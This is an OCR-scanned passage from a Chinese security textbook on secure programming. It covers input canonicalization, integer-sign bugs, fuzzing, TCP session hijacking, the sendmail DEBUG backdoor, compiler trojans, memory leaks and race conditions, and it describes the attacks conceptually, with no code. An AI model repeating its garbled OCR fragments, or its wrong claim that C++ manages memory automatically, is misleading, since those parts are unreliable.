能 够 避 开 这 种 检查 。 这 样 的 攻击 最 早 发 生 在 20 世纪 90 FAR, XTE Microsoft 的 IIS Web 
服务 器 的 许多 版 本 。 当 程序 把 多 个 不 同 的 字符 当成 相同 字符 处 理 的 时 候 ， 就 会 出 现 一 个 问题 。 
例如 ， 忽 略 字母 的 重音 后 一 个 大 小 写 不 敏感 的 程序 能 产生 字母 A 的 30 种 等 价 表示 。 这 些 例 子 
说 明 使 用 多 重 编码 会 出 现 问题 ， 检 查 危 险 的 数据 值 而 不 是 接受 已 知 的 安全 数据 也 会 出 现 问题 。 
在 这 个 例子 中 ， 与 一 个 文件 名 的 安全 规范 进行 比较 ， 可 以 拒绝 一 些 实际 上 可 以 接受 的 使 用 多 重 
编码 的 文件 名 。 然 而 ， 它 的 确 能 够 拒绝 危险 的 输入 值 。 

由 于 多 重 编码 的 可 能 性 ， 因 此 输入 的 数据 必须 首先 转换 成 单一 的 、 标 准 的 、 最 小 的 表示 
形式 ， 这 个 过 程 称 为 标准 化 (canonicalization)， 通 常用 一 个 通用 的 值 代替 那些 等 价 的 编码 。 一 
且 完 成 这 个 过 程 ， 输 入 的 数据 就 能 够 与 可 接受 的 输入 值 的 一 个 单一 表示 进行 比较 。 而 在 软件 当 
中 ， 需 要 检查 输入 和 输出 字段 的 量 可 能 会 非常 大 。[SIMP11] 和 其 他 一 些 阅读 材料 中 推荐 使 用 
anti-XSS 库 ， 或 者 带 有 集成 XSS 保护 的 Web 用 户 界面 框架 ， 它 们 可 以 自动 完成 大 部 分 检查 过 
程 ， 而 不 必 为 每 个 字段 编写 检查 代码 。 

还 有 另外 一 个 关注 点 就 是 ， 输 入 数据 代表 一 个 数字 数值 。 在 计算 机 上 这 样 的 值 是 用 固定 字 
节 长 度 表 示 的 。 整 数 一 般 是 8、16、32 位 ， 现 在 是 64 位 ， 浮 点 数 可 以 是 32、64、96 位 , 或 者 
是 其 他 的 位 数 ， 这 依赖 于 使 用 的 计算 机 处 理 器 。 这 些 值 可 能 是 有 符号 的 ， 也 可 能 是 无 符号 的 。 
当 对 输入 数据 进行 解释 的 时 候 ， 包 括 可 选 的 符号 、 清 零 、 十 进 制 值 和 乘 方 以 及 数字 数值 的 各 种 
表示 都 必须 准确 处 理 ， 数 值 数 据 的 后 续 使 用 也 必须 受到 监控 。 一 种 类 型 的 数据 强制 转换 成 另 一 
种 类 型 的 数据 可 能 发 生 问题 。 例 如 ， 一 个 缓冲 区 长 度 可 以 用 一 个 无 符号 整数 表示 ， 它 将 要 和 
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一 个 可 接受 的 最 大 缓冲 区 长 度 进行 比较 ， 在 比较 的 时 候 无 符号 值 可 以 转换 成 一 个 有 符号 值 来 
处 理 ， 不 同 的 语言 可 能 有 不 同 的 处 理 方式 。 这 就 导致 一 个 漏洞 ， 因 为 负数 的 最 高 位 为 1， 但 是 
最 高 位 为 1 的 无 符号 整数 又 是 一 个 较 大 的 正 数值 。 这 样 攻击 者 就 能 指定 一 个 很 大 的 输入 长 度 ， 
这 个 很 大 的 无 符号 型 输入 长 度 在 与 缓冲 区 的 最 大 长 度 进行 比较 的 时 候 是 作为 负数 处 理 的 。 一 
个 负数 明显 小 于 一 个 较 小 的 正 数 ， 这 说 明 比 较 是 成 功 的。 然而 ， 使 用 缓冲 区 的 时 候 输 入 数据 
将 会 超出 缓冲 区 的 实际 范围 ， 对 输入 数据 的 错误 处 理 就 产生 了 缓冲 区 溢出 。 在 这 里 我 们 再 次 
强调 一 定 要 仔细 检查 对 输入 数值 的 所 有 假设 ， 确 保 所 有 的 使 用 与 假设 一 致 。 


11.2.4 ”输入 的 fuzzing 技术 


很 明显 ， 预 测 并 测试 攻击 者 可 能 用 以 暗中 破坏 程序 的 所 有 可 能 的 非 标准 输入 类 型 是 很 困难 
的 。1989 年 Wisconsin Madison 大 学 的 Barton Miller 教授 研制 出 一 个 功能 强大 的 fuzzing 技术 ， 
这 是 一 个 软件 测试 技术 ， 它 使 用 随机 产生 的 数据 作为 程序 的 输入 进行 测试 。 测 试 的 输入 范围 很 
大 ， 包 括 直接 的 文本 或 者 图 形 输入 、 在 一 个 Web 和 其 他 的 分 布 式 服务 上 发 出 的 随机 网 络 请 求 ， 
以 及 传递 给 标准 库 函 数 或 者 系统 函数 的 随机 参数 值 。 测 试 的 目的 在 于 确定 程序 或 者 函数 是 否 能 
够 正确 处 理 所 有 的 非 正 常 输入 、 程 序 是 否 受到 破坏 ， 以 及 程序 失败 以 后 是 否 得 到 正确 响应 。 在 
后 面 的 情形 中 程序 或 者 函数 明显 存在 一 个 需要 纠正 的 bug。 对 任意 的 程序 、 服 务 或 者 函数 的 输 
入 假设 来 说 ，fuzzing 技术 的 主要 优点 就 是 简单 和 自由 。 而 且 产 生 大 量 测试 的 费用 非常 低 。 而 
且 这 样 的 测试 可 以 帮助 程序 识别 它 的 可 靠 性 和 安全 性 。 

尽管 输入 数据 能 够 完全 随机 产生 ， 它 也 能 依据 一 些 模 板 随 机 产生 。 可 以 设计 这 样 的 模板 
来 检查 可 能 存在 的 bug, 例如， 可 能 包括 特别 长 的 输入 或 者 不 包含 空格 和 其 他 字 边 界 ( word 
boundary) 的 文本 输入 。 当 和 网 络 协议 一 起 使 用 的 时 候 ， 该 模板 可 以 明确 针对 这 个 协议 的 重要 
方面 。 使 用 模板 的 目的 本 是 为 了 提高 检 出 bug 的 可 能 性 ， 但 是 缺点 在 于 把 模板 泥人 了 输入 假设 
中 ， 因 此 通过 其 他 形式 输入 的 数据 触发 的 bug 可 能 不 会 被 检测 到 。 我 们 建议 将 这 些 方法 组 合 起 
来 使 用 ， 对 所 有 的 输入 进行 合理 的 全 面 覆 盖 。 

Miller 教授 的 团队 ， 已 经 应 用 fuzzing 技术 测试 了 很 多 常用 的 操作 系统 和 应 用 程序 ， 包 括 
运行 在 Linux、Windows NT 和 最 近 的 Mac OS X 系统 上 的 常见 的 命令 行 和 图 形 用 户 界面 。 最 后 
的 测试 结果 总 结 在 [MILL07] 中 ,该 结果 指出 了 这 些 系 统 中 很 多 程序 存在 的 bug。 其 他 机 构 在 
各 种 系统 和 软件 中 已 经 使 用 了 这 些 测试 。 

尽管 fuzzing 技术 从 概念 上 讲 是 一 个 非常 简单 的 测试 方法 ， 但 它 也 有 局 限 性 。 一 般 而 言 ， 
fuzzing 技术 仅 能 识别 简单 类 型 的 输入 错误 ， 如 果 一 个 bug 仅仅 在 极 特 殊 的 输入 下 才能 够 触发 ， 
fuzzing 技术 就 不 太 可 能 找到 它 。 但 是 这 种 类 型 的 bug 又 经 常 是 特别 严重 的 ， 非 常 容易 受到 攻 
击 。 因 此 fuzzing 技术 应 该 作为 合理 的 全 面 测试 策略 的 一 部 分 被 采用 。 

目前 很 多 能 够 进行 fuzzing 测试 的 工具 都 是 非常 有 效 的 ， 很 多 的 机 构 和 个 人 都 使 用 这 些 工 
具 评 价 程序 和 应 用 的 安全 性 。 它 们 可 以 对 命令 行 参数 、 环 境 变 量 、Web 应 用 、 文 件 格式 、 网 
络 协议 和 各 种 形式 的 进程 间 通 信使 用 fuzzing 技术 进行 测试 。 许 多 相关 的 黑 盒 检测 工具 ， 包 
括 fuzzing 检测 在 内 ， 在 [MIRA05] 中 都 有 描述 。 许 多 机 构 使 用 这 些 工具 提高 了 软件 的 安全 性 ， 
而 攻击 者 使 用 fuzzing 技术 也 可 识别 常用 软件 中 可 利用 的 bug。 因 此 对 开发 者 和 维护 者 来 说 ， 
fuzzing 技术 变 得 越 来 越 重要 ， 他 们 可 以 在 攻击 者 发 现 和 攻击 bug 之 前 找到 并 且 改 正 这 些 bug。 


11.3 ”编写 安全 程序 代码 


我 们 的 计算 机 程序 模型 的 第 二 大 组 件 是 依据 一 些 算法 处 理 输入 数据 。 对 过 程 化 的 语言 像 C 语 
言 和 它 派生 的 语言 来 说 ， 计 算 机 算法 指定 了 从 处 理 输入 开始 的 一 系列 步骤 ， 以 解决 需要 解决 的 问 
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题 ， 高 级 程序 语言 经 过 编译 和 链接 成 为 可 以 直接 在 目标 处 理 器 上 执行 的 机 器 代码 ， 在 10.1 节 我 们 
讨论 了 执行 程序 使 用 的 典型 的 过 程 化 结构 ;另外 ， 高 级 语言 ， 例 如 Java， 可 以 被 编译 成 为 一 种 中 
间 语 言 ， 该 中 间 语 言 能 够 在 目标 系统 上 被 一 些 程序 进行 解释 。 使 用 解释 型 的 脚本 语言 编写 的 程序 
同样 可 以 完成 这 个 工作 。 不 管 是 哪 种 情形 ， 一 个 程序 的 执行 就 是 机 器 指令 的 运行 ， 在 执行 的 过 程 
中 处 理 器 实现 了 某 种 算法 。 这 些 指 令 将 处 理 存 储 在 内 存 的 不 同 区 域 和 处 理 器 寄存 器 中 的 数据 。 

从 软件 安全 的 前 景 看 ， 还 存在 一 些 关键 问题 : 实现 的 算法 是 否 能 够 正确 解决 指定 的 问题 ; 
执行 的 机 器 指令 是 否 正确 体现 了 高 级 算法 的 规范 ; 对 存储 在 机 器 的 寄存 器 或 者 内 存 中 的 变量 的 
处 理 是 否 有 效 和 有 意义 。 


11.3.1 算法 的 正确 实现 


第 一 个 关键 问题 是 一 个 良好 的 程序 开发 技术 中 最 主要 的 问题 之 一 。 如 果 一 个 算法 没有 正确 
实现 问题 的 所 有 情形 和 变化 ， 这 就 可 能 允许 一 些 似乎 合法 的 程序 输入 触发 一 些 程序 行为 ， 而 这 
些 程序 行为 并 不 是 程序 应 该 完成 的 ， 因 而 给 攻击 者 提供 了 一 些 其 他 的 能 力 。 这 个 错误 可 能 是 由 
于 对 程序 输入 不 合适 的 解释 或 者 处 理 造 成 的 ， 正 如 我 们 在 11.2 节 讨 论 的 那样 ， 但 它 也 可 能 是 
对 本 来 有 效 的 输入 没有 进行 适当 处 理 引起 的 。 在 算法 的 设计 或 者 实现 过 程 中 存在 这 些 不 足 ， 最 
终 导 致 程序 受到 攻击 。 

这 方面 比较 好 的 例子 是 在 Netscape Web 浏览 器 的 一 些 早期 版 本 中 发 现 的 bug。 浏 览 器 中 的 
随机 数 发 生 器 为 可 靠 的 Web 连接 产生 会 话 密 钥 ， 而 发 生 器 的 实现 是 不 理想 的 [GOWA01]。 它 
本 来 假设 这 些 数字 是 不 易 猜 测 的 短 整 型 数 。 然 而 ， 由 于 这 个 算法 所 使 用 的 种 子 的 可 选 信息 很 
少 ， 造 成 这 些 数 字 相当 容易 猜测 。 因 此 ， 攻 击 者 可 能 猜 到 一 个 可 靠 的 Web 会 话 使 用 的 密 钥 并 
且 破 译 出 交换 的 数据 。 解 决 的 方法 就 是 重新 实现 随机 数 发 生 器 ， 确 保 算 法 使 用 的 种 子 具 有 充足 
的 、 不 易 猜 测 的 信息 ， 这 样 攻击 者 就 不 可 能 猜 到 密 铀 。 

另 一 个 众所周知 的 例子 是 TCP 会 话 欺骗 (spoof) 或 者 hijack 攻击 。 这 个 例子 扩展 了 我 们 
在 7.1 节 中 讨论 的 发 送 一 个 伪造 的 数据 包 到 一 个 TCP 服务 器 的 概念 。 这 次 攻击 的 目标 不 是 使 服 
务 器 处 于 半 开 放 连 接 状态 ， 而 是 欺骗 服务 器 接受 伪造 源 地 址 的 数据 包 ， 其 中 源 地 址 属于 可 信 
的 主机 但 数据 包 却 源 于 攻击 者 的 系统 。 如 果 攻 击 成 功 ， 就 会 说 服 服务 器 运行 一 些 命令 或 者 提 
供 数据 访问 ， 前 提 是 这 些 服务 是 允许 提供 给 可 信和 主机 的 。 为 了 理解 这 次 攻击 的 需求 ， 我 们 考 
EA 7-2 中 显示 的 TCP 三 次 握手 连接 。 我 们 回想 一 下 ， 由 于 使 用 一 个 伪造 的 源 地 址 ， 攻 击 者 
没有 看 到 来 自 服务 器 的 响应 ， 所 以 他 们 不 知道 服务 器 提供 的 初始 序列 号 。 然 而 ， 如 果 攻 击 者 能 
够 正确 猜 到 这 个 数字 ， 就 可 以 建立 一 个 ACK 包 发 送 到 服务 器 ， 接 下 来 假定 与 服务 器 的 连接 已 
经 建立 。 服 务 器 认为 任何 后 续 的 数据 包 都 来 源 于 可 信 的 主机 ， 并 按照 其 分 配 的 权限 处 理 这 些 数 
据 。 这 次 攻击 的 hijack 变量 一 直 等 待 ， 直 到 一 些 授权 的 外 部 用 户 连接 并 登录 服务 器 。 接 下 来 攻 
击 者 尝试 猜测 序列 号 ， 使 用 伪造 的 内 容 模 仿 授权 用 户 发 给 服务 器 的 下 一 个 数据 包 ， 并 将 其 发 送 
到 服务 器 。 如 果 猜 测 的 数字 正确 ， 攻 击 者 使 用 授权 用 户 的 访问 权限 和 访问 许可 发 出 任何 请 求 ， 
服务 器 都 会 响应 。 对 这 些 攻击 来 说 还 有 另外 一 个 麻烦 的 问题 ， 任 何 来 自 服务 器 的 响应 都 被 发 送 
到 伪造 地 址 所 在 的 系统 中 。 由 于 可 信和 主机 确认 服务 器 没有 发 送 数据 包 ， 这 个 系统 就 假设 存在 一 
个 网 络 错误 并 发 送 一 个 reset (RST) 数据 包 中 断 这 次 连接 。 攻 击 者 必须 确保 ， 在 可 信和 主机 系统 
发 送 中 断 之 前 将 攻击 数据 包 发 送 到 服务 器 并 且 被 处 理 ， 攻 击 者 在 攻击 目标 服务 器 的 同时 向 可 信 
主机 系统 发 出 一 个 拒绝 服务 (denial-of-sevice) 攻击 ， 就 可 以 达到 这 个 目的 。 

由 于 很 多 TCP/IP 的 实现 所 使 用 的 初始 序列 号 都 容易 猜测 ， 这 一 缺陷 为 这 些 攻 击 提供 了 机 
会 。 另 外 ， 使 用 序列 号 能 够 识别 一 个 会 话 的 所 有 数据 包 。TCP/P 的 标准 规定 每 一 次 连接 使 用 
一 个 新 的 、 不 同 的 序列 号 ， 这 样 就 能 够 区 分 以 前 连接 的 数据 包 ， 这 个 序列 号 可 能 是 一 个 随机 
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数 (服从 某 些 约束 条 件 )。 很 多 TCP 的 实现 使 用 非常 容易 预测 的 算法 来 产生 下 一 个 初始 序列 号 。 
把 这 些 隐 含 使 用 的 序列 号 组 合 在 一 起 作为 一 个 TCP 会 话 数据 包 的 鉴别 器 和 认证 器 。 一 旦 这 些 
工作 失败 ， 就 容易 预测 到 这 些 序列 号 ， 攻 击 就 会 发 生 。 很 多 新 发 行 的 操作 系统 现在 都 支持 随机 
的 初始 序列 号 ， 这 些 系统 对 这 类 攻击 具有 免疫 能 力 。 

程序 员 经 常 在 程序 中 故意 设置 一 些 用 于 检测 和 调试 的 代码 ， 这 是 这 个 问题 的 另 一 种 表现 形 
式 。 尽 管 在 程序 开发 过 程 中 设置 一 些 代码 是 有 效 的 ， 但 在 程序 的 产品 发 行 版 中 也 会 经 常 遗 留 下 
这 些 代码 。 至 少 ， 这 些 代码 会 将 一 些 不 合适 的 信息 透露 给 使 用 该 程序 的 用 户 。 在 最 坏 情 况 下 ， 
它 人 允许 用 户 绕 过 安全 检查 或 者 程序 的 其 他 限制 ， 完 成 其 他 一 些 不 允许 完成 的 动作 。 这 类 漏洞 可 
以 在 邮件 投递 程序 sendmail 中 看 到 ，20 世纪 80 年 代 末 著名 的 Morris Internet 蠕虫 攻击 的 就 是 
这 个 程序 。sendmail 的 开发 者 在 程序 中 保留 了 一 些 这 样 的 代码 ， 该 代码 支持 一 个 DEBUG 命令 ， 
这 个 命令 允许 用 户 远 程 查询 和 控制 正在 运行 的 程序 [SPAF89]。 蠕 虫 使 用 这 个 特征 感染 正在 运 
行 sendmail 的 系统 ， 因 为 程序 sendmail 使 用 超级 用 户 权 限 运 行 ， 它 可 以 不 受 限 制 地 访问 系统 ， 
改变 系统 信息 ， 因 而 使 问题 变 得 非常 严重 。 我 们 将 在 11.4 节 进 一 步 讨 论 特 权 最 小 化 问题 。 

一 个 更 进一步 的 例子 涉及 高 级 语言 或 者 中 级 语言 解释 器 的 实现 。 其 假设 是 解释 器 可 以 正确 
实现 特定 的 程序 代码 。 语 言语 法 分 析 失 败 会 导致 bug 的 出 现 ， 这 些 bug 可 能 被 攻击 者 利用 。 一 
些 早期 的 Java 虚拟 机 (JVM) 的 实现 没有 充分 进行 安全 检查 ， 特 别 是 对 远程 的 源 代码 ， 例 如 在 
applets 中 [DEFW96] 我 们 可 以 明显 看 到 。 这 些 实现 允许 攻击 者 远程 传递 代码 ， 例 如 在 Web 页 
上 , 但 是 JVM 解释 器 像 对 待 本 地 资源 一 样 处 理 这 些 远程 代码 ， 因 而 这 些 代 码 可 以 访问 更 多 的 
本 地 系统 资源 和 数据 资源 。 

上 面 这 些 例子 说 明 设计 和 实现 一 个 程序 需要 认真 仔细 。 仔 细 分 析 假 设 是 非常 重要 的 ， 例 
如 ， 产 生 的 随机 数 实 际 上 应 该 不 容易 预测 ， 以 保证 通过 程序 代码 产生 的 这 些 假设 令 人 满意 。 识 
别 程序 在 调试 和 测试 时 使 用 的 扩展 代码 ， 保 证 在 程序 发 布 和 使 用 之 前 将 这 些 内 容 移 除 或 者 禁 
用 ,这 也 是 非常 重要 的 。 


1.3.2 ”保证 机 器 语言 与 算法 一 致 


第 二 个 关键 问题 涉及 在 一 些 程序 设计 语言 中 指定 的 算法 和 实现 这 个 算法 所 运行 的 机 器 指令 
之 间 的 一 致 性 ， 这 个 问题 是 大 多 数 程序 员 最 容易 忽略 的 问题 。 其 假设 是 编译 器 或 者 解释 器 能 真 
正 产生 或 执行 可 以 有 效 实现 语言 语句 的 代码 。 当 考虑 这 个 假设 时 ， 这 个 问题 明显 是 效率 问题 之 
一 ， 它 通常 是 通过 指定 最 优化 标志 需要 的 级 别 给 编译 器 来 处 理 。 

关于 被 编译 的 语言 ， 正 如 Ken Thompon 在 [THOM84] 提出 的 那样 ， 一 个 恶意 的 编译 器 ， 
程序 员 能 够 在 其 中 包含 一 些 指令 ， 当 它 处 理 一 些 特殊 的 输入 语句 的 时 候 触 发 附加 的 代码 。 这 些 
语句 甚至 包含 了 部 分 编译 程序 ， 所 以 当 编 译 器 源 代码 被 编译 的 时 候 ， 即 使 在 从 编译 器 源 代 码 中 
移 除 所 有 附加 的 代码 之 后 也 能 重新 插入 这 些 变化 。 如 果 这 样 做 了 ， 这 些 变 化 的 唯一 证 据 只 能 在 
机 器 代码 中 找到 。 但 是 需要 仔细 比较 产生 的 机 器 代码 与 原来 的 源 代码 才能 发 现 这 些 变 化 。 一 个 
较 大 的 程序 ， 其 中 包含 很 多 源 文件 ， 如 果 进 行 比较 将 是 一 个 极 慢 而 又 困难 的 任务 ， 一 般 来 说 ， 
没有 人 愿意 这 样 做 。 

具备 较 高 保险 级 别 的 可 信 计 算 机 系统 的 开发 是 需要 这 个 级 别 的 检查 的 一 个 领域 。 特 别 是 使 
用 公共 标准 保险 级 别 EAL7 的 计算 机 系统 安全 认证 就 需要 验证 在 设计 、 源 代码 以 及 目标 代码 之 
间 的 一 致 性 。 我 们 将 在 第 13 章 详 细 讨 论 这 个 问题 。 


11.3.3 ”数据 值 的 正确 解释 
下 一 个 关键 问题 涉及 数据 值 的 正确 解释 。 在 计算 机 的 最 底层 ， 所 有 的 数据 都 是 以 二 进 制 位 
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组 的 形式 进行 存储 的 。 这 些 数 据 存储 在 内 存 的 字 节 中 ， 而 这 些 字 节 会 形成 一 个 较 大 的 存储 单 
元 ， 例 如 一 个 字 (word) 或 者 长 字 (longword)。 这 些 数据 可 以 在 内 存 中 被 访问 和 处 理 ， 也 可 以 
在 使 用 之 前 拷贝 到 处 理 器 寄存 器 中 。 一 个 特定 的 比特 组 可 以 解释 为 一 个 字符 、 一 个 整数 、 一 个 
浮 点 数 、 一 个 内 存 地 址 (指针 )， 还 可 以 是 一 些 更 复杂 的 解释 。 这 些 解 释 依 赖 于 处 理 它 的 程序 
操作 ， 但 是 最 终 依 赖 于 执行 的 具体 机 器 指令 。 不 同 的 程序 语言 提供 了 不 同 的 能 力 ， 限 制 和 验证 
对 变量 的 数据 解释 做 出 的 各 种 假设 。 如 果 程 序 语言 包含 较 强 的 数据 类 型 ， 那 么 在 任何 一 个 特殊 
类 型 的 数据 上 完成 的 操作 都 将 被 限定 为 数值 的 适当 处 理 9S。 这 将 极 大 减少 程序 中 出 现 不 恰当 操 
作 的 可 能 性 ， 也 将 减少 程序 中 由 于 使 用 变量 引入 错 误 的 可 能 。 可 是 其 他 一 些 语言 接受 比较 自由 
的 数据 解释 ， 人 允许 程序 代码 明显 改变 对 数据 值 的 解释 ， 广 泛 使 用 的 C 语言 就 具有 这 个 特性 ， 
正如 我 们 在 10.1 节 讨 论 的 。 特 别 是 将 一 个 变量 的 值 解释 为 整数 或 者 内 存 地 址 (指针 ) 都 可 以 ， 
在 它们 之 间 进 行 转换 非常 容易 。 这 是 在 C 语言 的 结构 和 机 器 语言 指令 的 性 能 之 间 存 在 紧密 联 
系 的 结果 ， 并 且 对 系统 级 别 的 程序 设计 来 说 该 种 做 法 提供 了 极 大 的 方便 。 然 而 ， 它 也 容易 由 于 
指针 的 使 用 和 不 恰当 的 操作 而 产生 许多 错误 ， 正 如 我 们 在 第 10 章 讨 论 的 ， 缓 冲 区 溢出 就 是 这 
样 的 原因 造成 的 错误 。 这 里 还 有 一 个 相似 的 问题 会 引起 错误 的 发 生 ， 那 就 是 由 于 对 复杂 数据 结 
构 中 指针 的 不 正确 处 理 ， 例 如 链表 或 树 ， 都 会 导致 结构 的 破坏 或 者 数值 的 改变 。 任 何 这 样 的 程 
序 设计 bug 都 可 能 给 攻击 者 提供 一 种 方式 ， 来 破坏 程序 的 正确 操作 ， 或 者 使 程序 裔 省 。 

针对 这 些 错误 ， 最 好 的 防御 方法 是 使 用 具有 较 强 类 型 的 编程 语言 。 然 而 ， 即 使 主 程序 使 
用 这 样 的 语言 进行 编写 ， 但 是 它 还 是 需要 访问 和 使 用 操作 系统 的 服务 和 标准 库 函 数 ， 而 这 些 
服务 和 函数 大 多 数 又 都 是 使 用 像 C 语言 一 样 的 程序 设计 语言 编写 的 ， 所 以 它们 都 可 能 存在 漏 
洞 。 唯 一 的 办 法 就 是 监控 在 系统 的 使 用 过 程 中 已 经 发 现 的 那些 bug， 或 者 不 去 使 用 那些 存在 严 
E bug 的 库 函 数 。 如 果 使 用 了 一 种 松散 类 型 的 语言 (loosely typed language)， 比 如 C 语言 ， 我 
们 就 必须 仔细 处 理 在 各 种 数据 类 型 之 间 强 制 转换 的 数据 ， 在 使 用 时 保证 它们 都 是 有 效 的 。 


11.3.4 ”内 存 的 正确 使 用 


与 数据 值 的 解释 相关 的 一 个 问题 是 内 存 的 动态 分 配 和 管理 ， 其 一 般 用 于 堆 的 人 处理 。 在 操作 
未 知 长 度 的 数据 时 ， 很 多 程序 使 用 动态 分 配 的 方法 存储 数据 。 程 序 需要 使 用 内 存 的 时 候 就 动态 
分 配 ， 使 用 之 后 随即 释放 。 如 果 一 个 程序 没有 正确 管理 这 个 过 程 ， 后 果 可 能 是 堆 区 的 可 用 内 存 
逐步 减少 ， 直 至 完全 用 尽 。 这 被 称 为 内 存 汇 漏 (memory leak)， 一 旦 堆 区 的 可 用 内 存 用 尽 ， 程 
序 将 会 崩溃 。 这 给 攻击 者 提供 了 一 个 明显 的 机 制 ， 可 以 在 这 样 的 程序 中 实现 拒绝 服务 攻击 。 

很 多 早期 的 语言 ， 包 括 C 语言 ， 对 动态 分 配 内存 没 有 提供 明确 的 支持 ， 它 们 通过 调用 标 
准 库 函 数 的 形式 分 配 和 释放 内 存 。 然 而 ， 对 于 大 型 的 、 复 杂 的 程序 来 讲 ， 准 确 地 确定 何 时 不 再 
需要 动态 分 配 内 存 ， 是 一 项 非常 困难 的 任务 。 因 此 在 这 些 程序 里 内 存 泄漏 很 容易 发 生 ， 但 是 确 
定 和 改正 内 存 泄 漏 却 很 困难 。 有 很 多 不 同 的 库 变量 能 够 对 这 样 的 内 存 分 配 实现 更 高 级 别 的 检查 
和 调试 ， 它 们 可 以 用 于 辅助 这 个 过 程 。 

像 Java 和 C++ 等 语言 都 是 自动 管理 内 存 的 分 配 和 释放 。 虽 然 这 些 语 言 因 支 持 这 种 自动 管 
理会 引起 运行 方面 的 开销 ， 但 结果 却 使 得 程序 更 可 靠 。 使 用 这 些 语 言 的 目的 是 鼓励 避 开 内 存 管 
理 问 题 。 


1.3.5 ”阻止 共享 内 存 竞争 条 件 的 产生 
另 一 个 我 们 关心 的 问题 是 多 个 进程 或 一 个 进程 的 多 个 线程 访问 通用 共享 内 存 的 管理 。 如 果 


O ”提供 的 编译 器 或 者 解释 器 在 将 高 级 语言 语句 翻译 为 直接 执行 的 机 器 指令 过 程 中 没有 包含 任何 bug。 
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没有 恰当 的 访问 同步 机 制 ， 那 么 这 些 进 程 或 线程 由 于 重 琶 访问 、 使 用 和 替代 共享 值 ， 就 可 能 导 
致 数据 值 被 破坏 或 修改 丢失 。 当 多 个 进程 或 线程 通过 竞争 来 获取 对 一 些 资源 的 未 加 控制 的 访问 
时 ， 会 导致 竞争 条 件 (race condition) 的 发 生 。 这 是 一 个 众所周知 的 并 用 文档 记录 的 问题 ， 当 
编写 并 发 代码 时 ， 这 个 问题 就 出 现 了 。 该 问题 的 解决 方法 是 需要 正确 选择 和 使 用 适当 的 同步 原 
语 。 即 使 这 样 ， 也 不 容易 找到 最 合适 和 有 效 的 选择 。 如 果 我 们 选择 了 不 正确 的 同步 原 语序 列 ， 
就 有 可 能 造成 各 种 进程 或 线程 的 死 锁 ( deadlock)， 这 时 每 个 进程 或 线程 都 在 等 待 访问 一 个 资 
源 ， 而 这 个 资源 正在 被 其 他 的 进程 或 线程 访问 。 如 果 不 中 断 其 中 的 一 个 或 者 多 个 程序 ， 就 没有 
更 简单 的 方法 从 死 锁 中 恢复 。 攻 击 者 能 够 在 存在 漏洞 的 程序 里 触发 一 个 死 锁 ， 实 现 拒绝 服务 攻 
击 。 在 大 型 的 复杂 应 用 程序 中 ， 程序 员 保证 不 发 生死 锁 是 很 困难 的 。 他 们 需要 仔细 设计 和 分 解 
问题 ， 限 制 访问 共享 内 存 的 区 域 ， 并 确定 使 用 最 好 的 原 语 。 


11.4 与 操作 系统 和 其 他 程序 进行 交互 


我 们 的 计算 机 程序 模型 的 第 三 个 组 件 ， 是 程序 在 操作 系统 的 控制 下 在 计算 机 系统 上 执行 。 
这 个 问题 在 初级 的 编程 课程 中 通常 不 被 重视 。 然 而 ， 从 编写 安全 软件 的 角度 来 看 ， 这 是 很 重要 
的 问题 。 一 般 而 言 ， 除 了 专用 的 艇 人 式 程序 ， 在 大 多 数 计算 机 系统 上 ， 程 序 并 不 是 孤立 地 运 
行 ， 而 是 在 操作 系统 的 控制 下 运行 。 操 作 系 统管 理 着 该 程序 对 系统 资源 的 访问 ， 实 现 系统 资源 
在 所 有 并 发 执行 的 程序 间 共 享 。 

如 图 10-4 所 示 ， 当 一 个 程序 运行 时 ， 操 作 系 统 构 造 一 个 进程 的 执行 环境 。 除 了 程序 代码 
和 程序 使 用 的 数据 外 ， 该 进程 还 包括 一 些 操作 系统 提供 的 信息 。 这 些 信息 包括 用 来 适应 程序 操 
作 的 环境 变量 ， 以 及 为 该 程序 指定 的 命令 行 参数 。 所 有 这 些 数据 应 被 视 为 程序 的 外 部 输入 ， 所 
以 在 使 用 它们 之 前 必须 保证 其 有 效 性 ， 正 如 我 们 在 11.2 节 中 讨论 的 。 

一 般 而 言 ， 这 些 计算 机 系统 都 支持 多 用 户 。 像 文件 和 设备 等 资源 都 被 一 个 用 户 所 拥有 ， 针 
对 不 同 种 类 的 用 户 分 配 不 同 的 访问 权限 。 在 第 4 章 中 我 们 深入 地 讨论 了 这 些 概念 。 从 软件 安全 
的 角度 讲 ， 程 序 通 常 需要 访问 多 种 资源 ， 如 文件 和 设备 等 。 除 非 被 授予 适当 的 访问 权限 ， 否 则 
程序 就 可 能 失败 。 然 而 ， 权 限 过 滥 也 是 很 危险 的 ， 因 为 程序 的 任何 bug 都 可 能 潜在 威胁 系统 的 
更 多 部 分 。 

当 多 个 程序 同时 访问 共享 资源 时 ， 例 如 访问 公共 文件 ， 也 需要 考虑 一 些 安全 问题 。 这 是 我 
们 在 11.3 节 中 讨论 的 共享 内 存 访问 管理 的 一 个 一 般 化 问题 。 许 多 类 似 的 问题 都 需要 恰当 的 同 
步 机 制 。 

现在 我 们 就 详细 讨论 上 面 的 这 些 问 题 。 


11.4.1 环境 变量 


HH EF (environment variable) 是 每 个 进程 从 其 父 进程 中 继承 的 能 够 影响 进程 运行 方式 
的 一 系列 字符 串 值 。 操 作 系统 在 构造 进程 的 内 存 空间 时 ， 将 这 些 信息 包含 其 中 。 默 认 情 况 下 ， 
进程 拷贝 父 进程 的 环境 变量 值 。 然 而 ， 执 行 新 程序 的 请 求 可 以 指定 使 用 一 系列 新 值 。 程 序 可 以 
在 任何 时 候 修改 进程 的 环境 变量 ， 这 些 修改 依次 传递 给 进程 所 产生 的 子 进程 。 一 些 环境 变量 名 
为 大 家 所 熟知 ， 它 们 被 很 多 程序 和 操作 系统 使 用 。 还 有 其 他 一 些 环境 变量 是 程序 自 定 义 的 。 环 
境 变 量 在 很 多 操作 系统 中 被 使 用 ， 包 括 UNIX RHA. DOS, Microsoft Windows 和 其 他 系统 。 

常见 的 环境 变量 包括 : PATH， 它 指定 搜索 任何 给 定 命令 的 目录 集合 ; IFS， 它 指定 shell 
脚本 中 使 用 的 字 边 界 ; LD LIBRARY _ PATH， 指定 动态 可 加 载 库 的 搜索 目录 列表 。 所 有 这 些 环 
境 变量 都 已 被 用 来 攻击 程序 。 

程序 的 安全 顾虑 在 于 这 些 环境 变量 提供 的 可 以 进入 一 个 程序 的 另 一 个 路 径 是 未 确认 的 数 
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据 ， 因 而 需要 进行 验证 。 在 一 次 攻击 中 ， 计 算 机 系统 的 本 地 用 户 经 常 利用 这 些 环境 变量 获取 对 
